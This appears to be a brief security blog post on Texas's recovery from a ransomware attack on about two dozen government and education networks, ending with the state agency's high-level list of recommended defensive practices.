We recently wrote about the upsurge in ransomware attacks, and one of the examples in that article was the recent attack on about two dozen governmental and educational networks in the state of Texas. Texas was initially tight lipped about what they were doing to mitigate the attack, in an effort to prevent the attackers from learning about their defensive strategies and systems, and adapting their attack vectors in response.
The State of Texas Department of Information Resources (DIR) took charge of the situation, and was able to provided a central point for coordinating their response. A large part of their success was the cybersecurity incident response plan (CIRT) that was already in place. This plan helped first responders to know what to do and who to notify and involve in the process. Within 4 days all the affected sites had been visited, and 25% of the sites were remediated. Within a week’s time, all of the sites had fully recovered from the attack.
The DIR recently went public with a list of cybersecurity practices that it believes are best suited to heading off crypto-ransomware attacks.
- Create and maintain a cybersecurity incident response plan and train an IR team.
- For remotely managed severs in a cloud services environment, only allow authentication to remote access software from inside the Cloud service provider’s location.
- Use two factor authentication on remote administration tools.
- Use VPNs for remote connections instead of RDP (remote desktop protocol.)
- Block inbound network traffic from TOR exit nodes, which interferes with the exploit’s ability to connect and gain traction.
- Block outbound network traffic to Pastebin, which is a favorite site to store stolen information.
- Detect unusual Powershell processes by using Endpoint Detection and Response solutions.
This is good advice for anyone who is responsible for protecting a larger commercial or governmental network. Considering the increased activity by ransomware groups, security professionals should get busy implementing these concepts.Share